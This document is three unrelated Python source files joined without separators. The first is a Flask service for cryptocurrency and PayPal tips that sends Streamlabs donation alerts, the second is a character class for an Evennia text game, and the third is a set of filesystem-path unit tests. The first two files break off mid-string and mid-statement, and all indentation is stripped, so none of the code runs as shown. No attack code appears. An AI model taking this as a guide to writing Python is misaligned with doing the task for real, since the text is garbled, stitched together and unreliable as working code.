#!flask/bin/python
from flask import render_template, flash, redirect, session, url_for, \
request, g, send_file, abort, jsonify
from flask_login import current_user
from flask_qrcode import QRcode
from app import app, db, lm
from datetime import datetime, timedelta
from config import STREAMLABS_CLIENT_ID, STREAMLABS_CLIENT_SECRET, \
GROESTLTIP_REDIRECT_URI
from .forms import RegisterForm, ProfileForm
from .models import User, PayReq, Transaction
from pycoin_grs.key import Key
from pycoin_grs.key.validate import is_address_valid
from exchanges.bitstamp import Bitstamp
from exchanges.GRS_bittrex import GRS_price
from decimal import Decimal
from .payment import check_payment_on_address, check_address_history
import pprint
import json
import bitcoin
import requests
import time
import sys
import qrcode
import os
from werkzeug.datastructures import ImmutableOrderedMultiDict
streamlabs_api_url = 'https://www.twitchalerts.com/api/v1.0/'
api_token = streamlabs_api_url + 'token'
api_user = streamlabs_api_url + 'user'
api_tips = streamlabs_api_url + "donations"
api_custom = streamlabs_api_url + "alerts"
callback_result = 0
# @app.route('/_delete_transaction_history')
# def delete_transaction_history():
# Transaction.query.delete()
# db.session.commit()
# return redirect(url_for('history'))
# @app.route('/_delete_payreq_history')
# def delete_payreq_history():
# PayReq.query.delete()
# db.session.commit()
# return redirect(url_for('history'))
@app.route('/_verify_payment', methods=['POST'])
def verify_payment():
btc_addr = request.form['btc_addr']
social_id = request.form['social_id']
db.session.commit()
payrec_check = PayReq.query.filter_by(addr=btc_addr).first()
print("PAYMENT CHECK")
history_check = check_address_history(btc_addr)
payment_check_return = {
'transaction_found': None,
'payment_verified' : "FALSE",
'user_display' : User.query.filter_by(
social_id=social_id
).first().nickname
}
print("***" + "checking for history on: " + btc_addr + "***\n")
if history_check and payrec_check:
payment_check_return['payment_verified'] = "TRUE"
print("Payment Found!")
amount = check_payment_on_address(btc_addr)
print(amount)
payment_check_return['transaction_found'] = history_check[0]['tx_hash']
payment_notify(social_id,
payrec_check,
amount,
history_check[0]['tx_hash'],
btc_addr)
db.session.delete(payrec_check)
db.session.commit()
return jsonify(payment_check_return)
def payment_notify(social_id, payrec, balance, txhash, grs_addr):
'''
Exchange Rate json file contains:
'exchange' : BitStamp/BitFinex/Kraken/Etc
'rate' : USD-Pair Exchange Rate for BTC
'datetime' : timestamp of when last grabbed
'''
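# Illustrative example of exchangerate.json contents (values are made up,
# the datetime format matches the strptime call below):
#   {"exchange": "bitstamp", "rate": 27000.0, "datetime": "2021-01-01 12:00:00.000000"}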
user = User.query.filter_by(social_id=social_id).first()
print(balance)
value = balance * GRS_price()
is_latest_exchange_valid = False
# if exchangerate.json doesn't already exist, create a new one
if not os.path.exists('exchangerate.json'):
f = open('exchangerate.json', 'w')
f.write("{}")
f.close()
with open("exchangerate.json", 'r') as f:
latestexchange = json.loads(f.read())
# if the file is valid ('datetime' key exists), go on and parse it
if 'datetime' in latestexchange:
latestexchange['datetime'] = datetime.strptime(
latestexchange['datetime'], '%Y-%m-%d %H:%M:%S.%f')
if (datetime.today() - latestexchange['datetime']) <= timedelta(hours=1):
print("using existing exchange rate")
is_latest_exchange_valid = True
exchange = latestexchange['rate']
# If we fail to get exchange rate from Bitstamp,
# use old, stored value.
print("Exchange rate too old! Grabbing exchange rate from Bitstamp")
try:
exchange = Bitstamp().get_current_price()
latestexchange = {
'exchange' : 'bitstamp',
'rate' : float(exchange),
'datetime' : str(datetime.today())
}
print("exchage rate data found!")
print(latestexchange)
with open('exchangerate.json', 'w') as f:
print("Opened exchange rate file for recording")
json.dump(latestexchange, f)
print("exchange rate recorded")
except:
if is_latest_exchange_valid:
exchange = latestexchange['rate']
else:
raise ValueError('No exchange rate available!')
# print("Converting Donation Amount to USD")
# print(value)
# print(exchange)
# print(type(value))
# print(type(exchange))
# print(float(exchange)/100000000)
usd_value = ((value) * float(exchange)/100000000)
usd_two_places = float(format(usd_value, '.2f'))
grs_amount = ((balance) /100000000)
#print(usd_two_places)
token_call = {
'grant_type' : 'refresh_token',
'client_id' : STREAMLABS_CLIENT_ID,
'client_secret' : STREAMLABS_CLIENT_SECRET,
'refresh_token' : user.streamlabs_rtoken,
'redirect_uri' : GROESTLTIP_REDIRECT_URI
}
headers = []
#print("Acquiring Streamlabs Access Tokens")
tip_response = requests.post(
api_token,
data=token_call,
headers=headers
).json()
#print("Tokens Acquired, Committing to Database")
user.streamlabs_rtoken = tip_response['refresh_token']
user.streamlabs_atoken = tip_response['access_token']
db.session.commit()
grs_amount_display = " ("+ str(grs_amount) +" GRS Donated)"
if payrec.user_message:
msg=payrec.user_message
else:
msg=''
tip_call = {
'name' : payrec.user_display,
'identifier' : payrec.user_identifier,
'message' : msg+grs_amount_display,
'amount' : usd_two_places,
'currency' : 'USD',
'access_token' : tip_response['access_token'],
'skip_alert' : 'yes'
}
tip_check = requests.post(
api_tips,
data=tip_call,
headers=headers
).json()
donation = payrec.user_display +" donated " + str(grs_amount) + " GRS ($" + str(usd_two_places) + ")\n"
tip_call = {
'type' : 'donation',
'message' : donation+msg,
'image_href' : user.image_ref,
'sound_href' : user.sound_ref,
'duration' : 5000,
'special_text_color' : user.text_color,
'access_token' : tip_response['access_token']
}
print(tip_call)
tip_check = requests.post(
api_custom,
data=tip_call,
headers=headers
).json()
print(tip_check)
# custom_notify(social_id, payrec.user_message, value, usd_two_places)
print("Saving transaction data in database...")
# transaction = Transaction.query.filter_by(addr=btc_addr).first()
payreq = PayReq.query.filter_by(addr=grs_addr).first()
new_transaction = Transaction(
twi_user=payreq.user_display,
twi_message=payreq.user_message,
user_id=social_id,
tx_id=txhash,
amount=grs_amount,
timestamp=payreq.timestamp
)
db.session.add(new_transaction)
db.session.commit()
print("Transaction data saved!")
print("Donation Alert Sent")
return tip_check
@app.route('/_create_payreq', methods=['POST'])
def create_payment_request():
social_id = request.form['social_id']
deriv = User.query.filter_by(social_id = social_id).first(). \
latest_derivation
address = get_unused_address(social_id, deriv)
new_payment_request = PayReq(
address,
user_display=request.form['user_display'],
user_identifier=request.form['user_identifier']+"_grs",
user_message=request.form['user_message']
)
db.session.add(new_payment_request)
db.session.commit()
return jsonify(
{'btc_addr': address}
)
@app.route('/tip/<username>')
def tip(username):
u = User.query.filter_by(social_id=username.lower()).first()
if u:
try:
session_nickname = session['nickname']
except:
session_nickname = None
return render_template(
'tipv2.html',
session_nickname=session_nickname,
nickname = u.nickname,
social_id = u.social_id,
display_text = u.display_text,
email = u.paypal_email
)
else:
return render_template(
'404.html',
username=username
)
def get_unused_address(social_id, deriv):
'''
Need to be careful about when to move up the latest_derivation listing.
Incrementing the database entry only when blockchain activity is
found is the least likely to create large gaps of empty addresses in
someone's GRS wallet.
'''
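# Sketch of the strategy above (wording is illustrative, not from the source):
# walk the user's xpub along chain 0 (xpub/0/deriv, xpub/0/deriv+1, ...) and hand
# out the first address that has neither blockchain history nor a pending payment
# request; latest_derivation is only bumped once history is actually found.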
pp = pprint.PrettyPrinter(indent=2)
userdata = User.query.filter_by(social_id = social_id).first()
# Pull GRS Address from given user data
key = Key.from_text(userdata.xpub).subkey(0). \
subkey(deriv)
address = key.address(use_uncompressed=False)
# if is_address_valid(userdata.xpub) == "GRS":
# return "STREAMER SUBMITTED GRSADDR INSTEAD OF XPUB, PLEASE INFORM "\
# + "STREAMER OR DEVELOPER"
#
# if is_address_valid(address) != "GRS":
# return "NO VALID ADDRESS, PLEASE INFORM STREAMER OR DEVELOPER"
# Check for existing payment request, delete if older than 5m.
payment_request = PayReq.query.filter_by(addr=address).first()
if payment_request:
req_timestamp = payment_request.timestamp
now_timestamp = datetime.utcnow()
delta_timestamp = now_timestamp - req_timestamp
if delta_timestamp > timedelta(seconds=60*5):
db.session.delete(payment_request)
db.session.commit()
payment_request = None
pp.pprint(check_payment_on_address(address))
if not check_address_history(address):
if not payment_request:
return address
else:
print("Address has payment request...")
print("Address Derivation: ", deriv)
return get_unused_address(social_id, deriv + 1)
else:
print("Address has blockchain history, searching new address...")
print("Address Derivation: ", userdata.latest_derivation)
userdata.latest_derivation = userdata.latest_derivation + 1
db.session.commit()
return get_unused_address(social_id, deriv + 1)
'''
Testing code below, please ignore
'''
@app.route('/tiptest/<username>')
def tiptest(username):
u = User.query.filter_by(social_id=username.lower()).first()
if u:
return render_template(
'tiptemplate.html',
nickname = u.nickname,
social_id = u.social_id,
display_text = u.display_text
)
else:
return abort(404)
@app.route('/customalerttest')
def custom_notify(social_id, user_message, value, usd_two_places):
user = User.query.filter_by(social_id=social_id).first()
token_call = {
'grant_type' : 'refresh_token',
'client_id' : STREAMLABS_CLIENT_ID,
'client_secret' : STREAMLABS_CLIENT_SECRET,
'refresh_token' : user.streamlabs_rtoken,
'redirect_uri' : GROESTLTIP_REDIRECT_URI
}
headers = []
tip_response = requests.post(
api_token,
data=token_call,
headers=headers
).json()
user.streamlabs_rtoken = tip_response['refresh_token']
user.streamlabs_atoken = tip_response['access_token']
db.session.commit()
donation = " | " + social_id +" donated " + str(value) + " GRS($" + str(usd_two_places) + ")",
tip_call = {
'type' : 'donation',
'message' : user_message + str(donation),
'image_href' : '',
'sound_href' : 'https://uploads.twitchalerts.com/000/003/774/415/m_health.wav',
'duration' : 3,
'special_text_color' : '#42ff42',
'access_token' : tip_response['access_token']
}
tip_check = requests.post(
api_custom,
data=tip_call,
headers=headers
).json()
print(tip_check)
return "Hello World"
@app.route('/paypal', methods=['POST'])
def create_payment_request_paypal():
if (request.form['user_display'] == ""):
user_display = "AnonymousDonator"
else:
user_display = request.form['user_display']
user_identifier = request.form['user_identifier']
user_message = request.form['user_message']
amount = request.form['amount']
print(amount)
random = os.urandom(17)
print(random)
new_payment_request = PayReq(
address=random,
user_display=user_display,
user_identifier=user_identifier+"_paypal",
user_message=user_message,
amount=amount
)
db.session.add(new_payment_request)
db.session.commit()
return jsonify({'data' : 'Payment Request made for: '+user_display})
@app.route('/ipn/<username>/to/<social_id>', methods=['POST'])
def ipn(username,social_id):
payreq = PayReq.query.filter_by(user_display=username).order_by(PayReq.timestamp.desc()).first()
print(payreq)
try:
arg = ''
request.parameter_storage_class = ImmutableOrderedMultiDict
values = request.form
for x, y in values.items():
arg += "&{x}={y}".format(x=x,y=y)
validate_url = 'https://www.paypal.com' \
'/cgi-bin/webscr?cmd=_notify-validate{arg}' \
.format(arg=arg)
r = requests.get(validate_url)
print(r)
print(r.text)
if r.text == 'VERIFIED':
try:
#Paypal post
payer_email = request.form.get('payer_email')
unix = int(time.time())
payment_date = request.form.get('payment_date')
username = request.form.get('custom')
payment_fee = request.form.get('payment_fee')
payment_status = request.form.get('payment_status')
txn_id = request.form.get('txn_id')
# try:
if (payreq.user_display == "AnonymousGroestler"):
user_display = "AnonymousDonator"
else:
user_display = payreq.user_display
# except:
# return render_template(
# 'cancel.html'
# )
user_identifier = payreq.user_identifier
user_message = payreq.user_message
# if txn_id:
# print('got txn id from paypal user')
# else:
# txn_id =
user = User.query.filter_by(social_id=social_id).first()
token_call = {
'grant_type' : 'refresh_token',
'client_id' : STREAMLABS_CLIENT_ID,
'client_secret' : STREAMLABS_CLIENT_SECRET,
'refresh_token' : user.streamlabs_rtoken,
'redirect_uri' : GROESTLTIP_REDIRECT_URI
}
headers = []
#print("Acquiring Streamlabs Access Tokens")
tip_response = requests.post(
api_token,
data=token_call,
headers=headers
).json()
#print("Tokens Acquired, Committing to Database")
user.streamlabs_rtoken = tip_response['refresh_token']
user.streamlabs_atoken = tip_response['access_token']
db.session.commit()
#print("Tokens Committed to database, sending donation alert")
tip_call = {
'name' : user_display,
'identifier' : payreq.user_identifier,
'message' : payreq.user_message,
'amount' : payreq.amount,
'currency' : 'USD',
'access_token' : tip_response['access_token']
}
print(tip_call)
tip_check = requests.post(
api_tips,
data=tip_call,
headers=headers
).json()
print(tip_check)
# custom_notify(social_id, payrec.user_message, value, usd_two_places)
print("Donation Alert Sent")
new_transaction = Transaction(
twi_user=user_display,
twi_message=user_message,
user_id=social_id,
tx_id=payreq.addr,
amount=payreq.amount,
timestamp=datetime.utcnow()
)
db.session.add(new_transaction)
db.session.commit()
except Exception as e:
print('Likely the IPN sent two responses; TX_ID is only accepted once because it is unique. Check TX_ID from PayReq and Transaction: ' + str(e))
return r.text
except Exception as e:
print("ERROR:" + str(e))
return str(e)
@app.route('/confirmation/<username>/to/<social_id>', methods=['GET'])
def confirmation(username,social_id):
TX = Transaction.query.filter_by(user_id=social_id).order_by(Transaction.timestamp.desc()).first()
payreq = PayReq.query.filter_by(user_display=username).order_by(PayReq.timestamp.desc()).first()
if (TX.tx_id == payreq.addr):
payment_gross = TX.amount
status = 'Payment completed and verified.'
else:
payment_gross = payreq.amount
status = 'Payment completed but not yet verified. Keep checking history page to see if it appears. When it
"""
Template for Characters
Copy this module up one level and name it as you like, then
use it as a template to create your own Character class.
To make new logins default to creating characters
of your new type, change settings.BASE_CHARACTER_TYPECLASS to point to
your new class, e.g.
settings.BASE_CHARACTER_TYPECLASS = "game.gamesrc.objects.mychar.MyChar"
Note that objects already created in the database will not notice
this change, you have to convert them manually e.g. with the
@typeclass command.
"""
from ev import Character as DefaultCharacter
from game.gamesrc.world import body
from ev import logger
from ev import tickerhandler
from game.gamesrc.combat import wounds
from ev import create_script
from src.utils import utils, evtable
import re
from game.gamesrc.combat import move
MAX_HEALTH = 80
MAX_BLEED = MAX_HEALTH
class Character(DefaultCharacter):
"""
The Character is like any normal Object (see example/object.py for
a list of properties and methods), except it actually implements
some of its hook methods to do some work:
at_basetype_setup - always assigns the default_cmdset to this object type
(important!) sets locks so character cannot be picked up
and its commands only be called by itself, not anyone else.
(to change things, use at_object_creation() instead)
at_after_move - launches the "look" command
at_post_puppet(player) - when Player disconnects from the Character, we
store the current location, so the "unconnected" character
object does not need to stay on grid but can be given a
None-location while offline.
at_pre_puppet - just before Player re-connects, retrieves the character's
old location and puts it back on the grid with a "charname
has connected" message echoed to the room
"""
def at_object_creation(self):
"""
Called only at initial creation.
* Static health/stamina because there's no such things as stats/skills.
* Ch_state refers to what state they exist in on the game.
0 = dead
1 = alive
2 = suspended
* Boolean approved value refers to whether they've been approved for play.
Default value is False.
"""
####################################################################
# Stats
####################################################################
self.db.state = 1 # 1 is alive, 2 is unconscious, 3 is dead
self.db.max_health = MAX_HEALTH
self.db.health = MAX_HEALTH
self.db.max_bleed = self.db.max_health
self.db.move_wrapper = move.BAREHANDED_WRAPPER
# Current weight of items held
self.db.curr_weight = 0
# Encumbrance limit
self.db.max_weight = 300
# wielding
self.db.wielding = {"main": None, "off": None}
self.db.holding = []
self.db.holding_capacity = 2
# wounds
self.db.wounds = []
# character approved status - default is not approved
self.db.ch_approved = False
# sdesc/ldesc/keywords
self.db.sdesc = "an entity"
self.db.ldesc = "An entity is here, not formed into being yet."
self.db.race = "Raceless"
# Body holds information to what wearlocs are available to the character
self.db.settings = {"stance": "balanced"}
# and information about what could be worn over what (layered clothing)
self.db.body = body.human_body
# Initiate what they're wearing, which should be nothing.
self.db.equipped = {}
self.db.sex = "sexless"
self.db.default_weapon = {
"name": "fists",
"min": 1,
"max": 3,
"type": "blunt",
"dmg_bonus": 0,
"crit": 0.0,
"hands": 1,
"quality": 1}
for part in self.db.body:
self.db.equipped[part.name] = {}
if part.armor:
self.db.equipped[part.name]["armor"] = None
if part.clothing:
self.db.equipped[part.name]["clothing"] = None
def aliasify(self):
"""
This is used to generate a list of aliases based on our key.
This is particularly useful for objects that we need to generate
aliases or 'keywords' for so we can reference them.
"""
# generate a list of keywords for our alias
pre_aliases = self.db.sdesc.split(" ")
old_aliases = self.aliases.all()
new_aliases = [alias.strip().lower() for alias in pre_aliases
if alias.strip() and not
re.match("(\b[aA][n]|\b[tT]he|^[aA]$)", alias)]
old_aliases.extend(new_aliases)
aliases = list(set(old_aliases))
self.aliases.add(aliases)
def announce_move_from(self, destination):
"""
Called if the move is to be announced. This is
called while we are still standing in the old
location.
destination - the place we are going to.
"""
if not self.location:
return
name = self.name
loc_name = ""
loc_name = self.location.name
dest_name = destination.name
string = "\n%s is leaving %s, heading for %s.\n"
self.location.msg_contents(string % (name, loc_name, dest_name), exclude=self)
def announce_move_to(self, source_location):
"""
Called after the move if the move was not quiet. At this
point we are standing in the new location.
source_location - the place we came from
"""
name = self.name
if not source_location and self.location.has_player:
# This was created from nowhere and added to a player's
# inventory; it's probably the result of a create command.
string = "You now have %s in your possession." % name
self.location.msg(string)
return
src_name = "nowhere"
loc_name = self.location.name
if source_location:
src_name = source_location.name
string = "\n%s arrives to %s from %s.\n"
self.location.msg_contents(string % (name, loc_name, src_name), exclude=self)
#def msg(self, text=None, from_obj=None, sessid=0, pers=False,
# **kwargs):
"""
Overloaded msg method that properly capitalizes all the messages
the character gets. It makes sure that if there's a color code,
it properly capitalizes it anyways.
"""
"""
if pers:
# to do, replacing any mentions of sdescs with you/yours
# and also replacing any mentions of his/her/its with your
# if it follows the sdesc.
# replaces any mentions of sdesc's with your
text = text.replace("{M" + self.db.sdesc + "{n's", "your")
# replaces any mentions of sdesc with you
text = text.replace("{M" + self.db.sdesc + "{n", "you")
split_str = text.split(" ")
indices = []
for x in range(len(split_str)):
match = re.match("(you[rs]*)", split_str[x])
if match:
indices.append(x)
for index in indices:
if index == 0:
split_str[index] = "{M%s{n" % \
(split_str[index].capitalize())
elif split_str[index] == split_str[-1]:
split_str[index] = "{M%s{n" % \
(split_str[index])
else:
try:
prev_ind = index - 1
if split_str[prev_ind][-1] in "s" and \
"ss" not in split_str[prev_ind][-2:]:
split_str[prev_ind] = split_str[prev_ind][0:-1]
except:
pass
text = " ".join(split_str)
rtn = re.split('([.!?] *)', text)
for x in range(len(rtn)):
if rtn[x].startswith("{") and len(rtn[x]) > 3:
rtn[x] = rtn[x][0:1] + rtn[x][2].capitalize() + rtn[x][3:]
elif len(rtn[x]) > 1:
rtn[x] = rtn[x][0].capitalize() + rtn[x][1:]
else:
rtn[x] = rtn[x].capitalize()
if rtn:
text = "".join(rtn)
"""
#self.dbobj.msg(text=text, from_obj=from_obj, sessid=sessid, **kwargs)
def return_appearance(self, pobject):
string = ""
if not pobject:
return
# get and identify all objects
visible = (con for con in self.contents
if con != pobject and con.access(pobject, "view"))
exits, users, things = [], [], []
for con in visible:
key = con.key
if con.destination:
exits.append(key)
elif con.has_player:
if con.ndb.combat_handler:
vict_sdesc = con.ndb.combat_handler.pairs[con].db.sdesc
users.append("{M%s{n is currently {Rfighting{n {M%s{n!" % (con.db.sdesc.capitalize(), vict_sdesc))
else:
users.append(" {M%s{n" % (con.db.sdesc))
# get description, build string
desc = self.db.desc
char_wounds = [char_wound for char_wound in self.db.wounds if
isinstance(char_wound, wounds.Wound)]
if desc:
string += "%s\n" % desc
if char_wounds:
string += "\n{M%s{n suffers from the following wounds: " % (self.db.sdesc.capitalize())
wound_str = ""
for char_wound in char_wounds:
if not char_wounds[-1] == char_wound:
wound_str += str(char_wound) + ", "
else:
wound_str += str(char_wound) + "."
string += wound_str + "\n"
if exits:
string += "\n{wExits:{n " + ", ".join(exits) + "\n"
if self.db.holding:
h_table = evtable.EvTable(border=None)
things = [item.db.sdesc for item in self.db.holding if item]
for thing in things:
h_table.add_row("{w(holding in hand){n " + "{G%s{n" % (thing))
string += "\n\n%s" % (h_table)
items = [item for (part, item) in self.db.equipped.items() if
item["armor"] or item["clothing"]]
if self.db.wielding.values():
w_table = evtable.EvTable(border=None)
mwielding_str = None
owielding_str = None
if self.db.wielding["main"] and \
self.db.wielding["main"].db.hands > 1:
mwielding_str = "(wielding in both hands) {G%s{n" % \
(self.db.wielding["main"].db.sdesc)
elif self.db.wielding["main"]:
mwielding_str = "(wielding in main-hand) {G%s{n" % \
(self.db.wielding["main"].db.sdesc)
if self.db.wielding["main"] and self.db.wielding["main"].db.broken:
mwielding_str += " {R(broken){n"
if self.db.wielding["off"]:
owielding_str = "(wielding in off-hand) {G%s{n" % \
(self.db.wielding["off"].db.sdesc)
if self.db.wielding["off"] and self.db.wielding["off"].db.broken:
owielding_str += " {R[broken]{n"
if mwielding_str:
w_table.add_row(mwielding_str)
if owielding_str:
w_table.add_row(owielding_str)
table_str = "\n%s" % (w_table)
string += table_str
if any(items):
e_table = evtable.EvTable(border=None)
# need to get the actual order that the items should be in
# when the equipped table is put together
# eg. head, torso, arms, hands, legs, feet
body_order = [
(self.db.body[self.db.body.index(bodypart)].order_vis,
bodypart) for bodypart in self.db.equipped.keys()]
# sort the body order now
body_order = sorted(body_order, key=lambda body_o: body_o[0])
# we only want the bodypart now, not the number since it's ordered
body_order = [part[1] for part in body_order]
for part in body_order:
if self.db.equipped[part]["armor"]:
e_table.add_row("(worn over %s)" % (part) + " {G%s{n" %
(self.db.equipped[part]["armor"].db.sdesc))
elif self.db.equipped[part]["clothing"]:
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import ast
import errno
import json
import os
import subprocess
import sys
import tempfile
import threading
import unittest
from dataclasses import dataclass
from io import StringIO
from typing import AnyStr, Dict, Iterator, Optional
from ..common import byteme, check_popen_returncode
from ..fs_utils import (
Path,
create_ro,
generate_work_dir,
open_for_read_decompress,
populate_temp_dir_and_rename,
populate_temp_file_and_rename,
temp_dir,
)
_BAD_UTF = b"\xc3("
class TestFsUtils(unittest.TestCase):
def test_path_basics(self):
self.assertEqual(
byteme(os.getcwd()) + b"/foo/bar", Path("foo/bar").abspath()
)
self.assertEqual(b"/a/c", Path("/a/b/../c").realpath())
self.assertEqual(b"foo/bar", Path("foo") / "bar")
self.assertEqual(b"/foo/bar", b"/foo" / Path.or_none("bar"))
self.assertEqual(b"/baz", b"/be/bop" / Path(b"/baz"))
self.assertEqual("file:///a%2Cb", Path("/a,b").file_url())
self.assertEqual(b"bom", Path("/bim/bom").basename())
self.assertEqual(b"/bim", Path("/bim/bom").dirname())
self.assertEqual(b"ta/da", Path("./ta//gr/../da/").normpath())
self.assertEqual(b"/a/c", Path("/a/b/../c").realpath())
self.assertEqual(b"../c/d/e", Path("/a/b/c/d/e").relpath("/a/b/x"))
self.assertEqual(b"../../../y/z", Path("/y/z").relpath("/a/b/x"))
self.assertEqual(Path("foo"), Path("foo"))
self.assertIsNone(Path.or_none(None))
with self.assertRaises(TypeError):
Path("foo") == "foo"
with self.assertRaises(TypeError):
Path("foo") != "foo"
with self.assertRaises(TypeError):
Path("foo") > "foo"
with self.assertRaises(TypeError):
Path("foo") >= "foo"
with self.assertRaises(TypeError):
Path("foo") < "foo"
with self.assertRaises(TypeError):
Path("foo") <= "foo"
def test_path_is_hashable(self):
# Path must be hashable to be added to a set
ts = set()
ts.add(Path("foo"))
def test_bad_utf_is_bad(self):
with self.assertRaises(UnicodeDecodeError):
_BAD_UTF.decode()
def test_path_decode(self):
with tempfile.TemporaryDirectory() as td:
bad_utf_path = Path(td) / _BAD_UTF
self.assertTrue(bad_utf_path.endswith(b"/" + _BAD_UTF))
with open(bad_utf_path, "w"):
pass
res = subprocess.run(
[
sys.executable,
"-c",
f"import os;print(os.listdir({repr(td)}))",
],
stdout=subprocess.PIPE,
)
# Path's handling of invalid UTF-8 matches the default for
# Python3 when it gets such data from the filesystem.
self.assertEqual(
# Both evaluate to surrogate-escaped ['\udcc3('] plus a newline.
repr([bad_utf_path.basename().decode()]) + "\n",
res.stdout.decode(),
)
def test_path_exists(self):
does_not_exist = Path("non/existent")
for err in [True, False]:
self.assertFalse(does_not_exist.exists(raise_permission_error=err))
with temp_dir() as td:
i_exist = td / "cogito_ergo_sum"
i_exist.touch()
for err in [True, False]:
self.assertTrue(i_exist.exists(raise_permission_error=err))
if os.geteuid() == 0:
return # Skip "permission error" tests, `root` can see all.
old_mode = os.stat(td).st_mode
try:
os.chmod(td, 0)
self.assertFalse(i_exist.exists(raise_permission_error=False))
with self.assertRaises(PermissionError):
i_exist.exists(raise_permission_error=True)
finally:
os.chmod(td, old_mode)
def test_path_islink(self):
with temp_dir() as td:
target = td / "target"
link = td / "link"
# Real files aren't symlinks
self.assertFalse(target.islink())
os.symlink(target, link)
# Broken symlinks are still symlinks
self.assertTrue(link.islink())
# Non-broken symlinks are symlinks :)
target.touch()
self.assertTrue(link.islink())
def test_path_readlink(self):
with temp_dir() as td:
target = td / "target"
link = td / "link"
os.symlink(target, link)
self.assertEqual(target, link.readlink())
def test_path_wait_for(self):
with tempfile.TemporaryDirectory() as td:
to_wait_for = Path(td) / "will_you_wait_for_me"
def _make_file():
to_wait_for.touch()
t = threading.Timer(0.1, _make_file)
t.start()
# This will return without an exception
elapsed_ms = to_wait_for.wait_for(timeout_ms=100000)
self.assertTrue(elapsed_ms > 0)
# Just to be sure
t.cancel()
# Reset the file to re-run the test for negative assertion
os.unlink(to_wait_for)
with self.assertRaises(FileNotFoundError):
to_wait_for.wait_for(timeout_ms=100)
def test_path_format(self):
first = Path("a/b")
second = Path(_BAD_UTF)
formatted = "^a/b >" + _BAD_UTF.decode(errors="surrogateescape")
self.assertEqual(formatted, f"^{first:10}>{second}")
def test_path_from_argparse(self):
res = subprocess.run(
[
sys.executable,
"-c",
"import sys;print(repr(sys.argv[1]))",
_BAD_UTF,
],
stdout=subprocess.PIPE,
)
# Demangle non-UTF bytes in the same way that `sys.argv` mangles them.
self.assertEqual(
_BAD_UTF,
Path.from_argparse(
ast.literal_eval(res.stdout.rstrip(b"\n").decode())
),
)
def test_normalized_subpath(self):
for p in [Path("/need/not/exist"), Path("something/relative")]:
self.assertEqual(p, p.normalized_subpath("."))
for bad_path in ["..", "a/../../b/c/d", "../c/d/e"]:
with self.assertRaisesRegex(AssertionError, "is outside of"):
p.normalized_subpath(bad_path)
self.assertEqual(
p.normalized_subpath("a/b"), p.normalized_subpath("/a/b/.")
)
self.assertEqual(b"a/b", p.normalized_subpath("a/b").relpath(p))
def test_path_json(self):
# We can serialize `Path` to JSON, including invalid UTF-8.
# Unfortunately, `json` doesn't allow us to custom-serialize keys.
obj_in = {"a": Path("b"), "c": Path(_BAD_UTF), "builtin": 3}
# Deserializing to `Path` requires the consumer to know the type
# schema.
obj_out = {
"a": "b",
"c": _BAD_UTF.decode(errors="surrogateescape"),
"builtin": 3,
}
self.assertEqual(obj_out, json.loads(Path.json_dumps(obj_in)))
f = StringIO()
Path.json_dump(obj_in, f)
f.seek(0)
self.assertEqual(obj_out, json.load(f))
with self.assertRaises(TypeError):
Path.json_dumps({"not serializable": object()})
def test_path_listdir(self):
with temp_dir() as td:
(td / "a").touch()
(a,) = td.listdir()
self.assertIsInstance(a, Path)
self.assertEqual(b"a", a)
def test_path_parse_args(self):
p = argparse.ArgumentParser()
p.add_argument("--path", action="append", type=Path.from_argparse)
# Check that `Path` is now allowed, and that we can round-trip bad UTF.
argv = ["--path", Path("a"), "--path", Path(_BAD_UTF)]
with self.assertRaises(TypeError):
p.parse_args(argv)
args = Path.parse_args(p, argv)
self.assertEqual([Path("a"), Path(_BAD_UTF)], args.path)
def test_path_read_text(self):
with temp_dir() as td:
tmp_path = Path(td / "foo.txt")
with open(tmp_path, "w+") as f:
f.write("hello\n")
self.assertEqual("hello\n", tmp_path.read_text())
def test_path_open(self):
with temp_dir() as td:
tmp_path = Path(td / "foo.txt")
with tmp_path.open(mode="w+") as f:
f.write("hello\n")
with tmp_path.open() as f:
self.assertEqual("hello\n", f.read())
def test_path_shell_quote(self):
self.assertEqual(
Path(r"""/a\ b/c d/e'"f/( \t/""").shell_quote(),
r"""'/a\ b/c d/e'"'"'"f/( \t/'""",
)
def test_path_str(self):
self.assertEqual("a/b", str(Path("a/b")))
self.assertEqual(
_BAD_UTF.decode(errors="surrogateescape"), str(Path(_BAD_UTF))
)
def test_path_has_leading_dot_dot(self):
self.assertTrue(Path("..").has_leading_dot_dot())
self.assertTrue(Path("../a/b/c").has_leading_dot_dot())
self.assertFalse(Path("..a/b/c").has_leading_dot_dot())
self.assertFalse(Path("a/../b/c").has_leading_dot_dot())
# This shows that we don't normalize, thus this function does not
# check whether the relative path refers outside of its base.
self.assertFalse(Path("a/../../b/c").has_leading_dot_dot())
def test_path_touch(self):
with temp_dir() as td:
tmp_path = td / "touchme"
tmp_path.touch()
self.assertTrue(os.path.exists(tmp_path))
def test_path_validate(self):
result = "a/b"
for validator in Path.__get_validators__():
result = validator(result)
self.assertEqual(result, Path("a/b"))
self.assertIsInstance(result, Path)
def test_open_for_read_decompress(self):
# The goal is that our stream should be bigger than any buffers
# involved (so we get to test edge effects), but not so big that the
# test takes more than 1-2 seconds.
n_bytes = 12 << 20 # 12MiB
my_line = b"kitteh" * 700 + b"\n" # ~ 4KiB
for compress, ext in [("gzip", "gz"), ("zstd", "zst")]:
filename = "kitteh." + ext
with temp_dir() as td, open(td / filename, "wb") as outf:
with subprocess.Popen(
[compress, "-"], stdin=subprocess.PIPE, stdout=outf
) as proc:
for _ in range(n_bytes // len(my_line)):
proc.stdin.write(my_line)
check_popen_returncode(proc)
with open_for_read_decompress(td / filename) as infile:
for l in infile:
self.assertEqual(my_line, l)
# Test that an incomplete read doesn't cause SIGPIPE
with open_for_read_decompress(td / filename) as infile:
pass
# Test uncompressed
with temp_dir() as td:
with open(td / "kitteh", "wb") as outfile:
outfile.write(my_line + b"meow")
with open_for_read_decompress(td / "kitteh") as infile:
self.assertEqual(my_line + b"meow", infile.read())
# Test decompression error
with temp_dir() as td:
with open(td / "kitteh.gz", "wb") as outfile:
outfile.write(my_line)
with self.assertRaises(
subprocess.CalledProcessError
), open_for_read_decompress(td / "kitteh.gz") as infile:
infile.read()
def test_create_ro(self):
with temp_dir() as td:
with create_ro(td / "hello_ro", "w") as out_f:
out_f.write("world_ro")
with open(td / "hello_rw", "w") as out_f:
out_f.write("world_rw")
# `_create_ro` refuses to overwrite both RO and RW files.
with self.assertRaises(FileExistsError):
create_ro(td / "hello_ro", "w")
